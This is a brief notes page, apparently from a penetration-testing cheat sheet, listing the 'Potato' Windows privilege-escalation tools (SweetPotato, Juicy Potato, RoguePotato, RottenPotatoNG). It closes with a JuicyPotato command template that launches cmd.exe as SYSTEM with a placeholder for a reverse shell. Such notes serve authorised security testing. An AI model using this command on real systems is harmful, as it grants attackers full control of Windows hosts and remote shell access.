Potato
Potatoes π₯ is a set of potatoes that can be used to escalate privileges from Windows Service Accounts to NT AUTHORITY/SYSTEM.
- SweetPotato (1.6k β, 2022 πͺ¦)
- Juicy Potato (2.4k β, 2021 πͺ¦)
- RoguePotato (1.0k β, 2020 πͺ¦)
- RottenPotatoNG (0.9k β, 2017 πͺ¦)
- ...
Juicy and Rogue don't work on all versions of Windows.
π» To-do π»
Stuff that I found, but never read/used yet.
PS> # You can pick any port for -l. It's for DCOM traffic.
PS> .\JuicyPotato.exe -l any_port -p c:\windows\system32\cmd.exe -a "/c <reverse shell command>" -t *